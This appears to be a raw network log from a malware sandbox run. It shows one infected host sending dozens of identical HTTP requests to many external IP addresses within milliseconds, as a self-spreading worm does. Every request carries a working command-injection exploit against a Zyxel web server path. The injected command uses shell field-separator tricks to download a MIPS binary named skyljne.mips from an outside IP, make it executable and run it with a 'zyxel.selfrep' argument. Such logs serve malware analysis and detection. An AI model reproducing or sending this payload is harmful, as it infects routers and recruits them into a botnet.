                                    Jan 13, 2024 19:02:30.085944891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3460192.168.2.1335502160.71.213.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086021900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3461192.168.2.1349614123.164.127.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086054087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3462192.168.2.1348536157.228.115.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086137056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3463192.168.2.1335424104.17.53.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086191893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3464192.168.2.1345330145.105.164.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086245060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3465192.168.2.134504212.19.65.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086288929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3466192.168.2.134261434.116.255.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086334944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3467192.168.2.133932273.27.193.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086385012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3468192.168.2.135650824.142.223.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086426973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3469192.168.2.135013842.62.172.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086486101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3470192.168.2.1340658144.43.130.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086541891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3471192.168.2.1353938157.31.14.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086581945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3472192.168.2.1351380181.156.25.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086632013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3473192.168.2.136090446.20.178.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086695910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3474192.168.2.133687643.111.229.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086739063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3475192.168.2.1343886172.110.226.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086806059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3476192.168.2.1339406148.219.158.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086869955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3477192.168.2.1337106190.131.170.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086926937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3478192.168.2.1351986213.228.187.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.086998940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3479192.168.2.1344794163.41.246.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087027073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3480192.168.2.133815227.96.146.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087126017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3481192.168.2.1339214109.227.252.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087192059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3482192.168.2.1341120113.163.20.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087250948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3483192.168.2.1336442167.194.236.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087311983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3484192.168.2.1343102100.147.144.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087343931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3485192.168.2.135129634.75.134.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087382078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3486192.168.2.1354346197.199.18.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087457895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3487192.168.2.1352802177.149.248.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087483883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3488192.168.2.1343806200.168.98.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087587118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3489192.168.2.1338058141.212.200.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087611914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3490192.168.2.1353914125.143.28.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087663889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3491192.168.2.1349354134.169.68.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087742090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3492192.168.2.1346232137.255.73.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087807894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3493192.168.2.1334974125.65.218.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087841034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3494192.168.2.1354176197.31.181.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087944984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3495192.168.2.1356122221.113.202.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.087984085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3496192.168.2.133445698.109.126.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088051081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3497192.168.2.135092819.20.179.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088109970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3498192.168.2.1358296199.166.64.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088180065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3499192.168.2.1343602208.253.148.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088248968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3500192.168.2.1346698125.232.38.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088326931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3501192.168.2.1351672199.88.55.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088387012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3502192.168.2.1338400132.145.116.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088427067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3503192.168.2.1357656158.119.100.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088470936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3504192.168.2.1348146109.59.54.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088517904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3505192.168.2.1357636103.216.176.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088572979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3506192.168.2.133502460.184.51.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088660955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3507192.168.2.1347796122.41.76.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088732004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3508192.168.2.1347034207.198.237.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088788033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3509192.168.2.133801265.131.207.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088844061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3510192.168.2.1359218136.171.76.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088912010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3511192.168.2.1346248213.207.153.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.088963032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3512192.168.2.1340722155.195.188.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089029074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3513192.168.2.134820225.179.195.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089062929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3514192.168.2.134525675.202.223.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089138985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3515192.168.2.1358612179.209.217.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089181900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3516192.168.2.1341168109.225.146.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089215040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3517192.168.2.135278099.136.74.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089268923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3518192.168.2.1359576170.132.234.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089320898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3519192.168.2.135356858.199.124.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089370966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3520192.168.2.1345828176.187.225.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089428902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3521192.168.2.1335530140.177.250.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089493990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3522192.168.2.1349360197.25.200.251443
                                    TimestampBytes transferredDirectionData
